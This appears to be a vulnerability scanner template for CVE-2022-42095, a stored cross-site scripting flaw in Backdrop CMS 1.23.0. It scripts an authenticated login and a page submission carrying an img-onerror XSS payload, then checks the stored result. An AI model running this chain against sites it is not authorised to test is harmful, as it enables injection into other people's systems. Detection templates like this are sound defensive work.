id: CVE-2022-42095 info: name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored) author: theamanrawat severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content. remediation: | Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: - https://github.com/backdrop/backdrop/releases/tag/1.23.0 - https://github.com/bypazs/CVE-2022-42095 - https://nvd.nist.gov/vuln/detail/CVE-2022-42095 - https://backdropcms.org classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-42095 cwe-id: CWE-79 epss-score: 0.00344 epss-percentile: 0.68441 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: backdropcms product: backdrop_cms tags: cve,cve2022,xss,cms,backdrop,authenticated http: - raw: - | GET /?q=user/login HTTP/1.1 Host: {{Hostname}} - | POST /?q=user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in - | GET /?q=node/add/page HTTP/1.1 Host: {{Hostname}} - | POST /?q=node/add/page HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded title={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save - | POST /?q={{randstr}} HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers: - type: dsl dsl: - "status_code_5 == 200" - "contains(header_5, 'text/html')" - 'contains(body_5, "")' - "contains(body_5, 'Backdrop CMS')" condition: and extractors: - type: regex name: form_id_1 group: 1 regex: - 'name="form_build_id" value="(.*)"' internal: true - type: regex name: form_id_2 group: 1 regex: - 'name="form_build_id" value="(.*)"' internal: true - type: regex name: form_token group: 1 regex: - 'name="form_token" value="(.*)"' internal: true # digest: 4a0a00473045022100ae626cb63946b6ff7d7d6634c9998e17effee1a0d3ae30fc9ac67af42e2bb68a02203e9fac08c15cb78d5af2e4b8c3da5b2eecd1018a3d7b88aab5fec86bf7ad5ea6:922c64590222798bb761d5b6d8e72950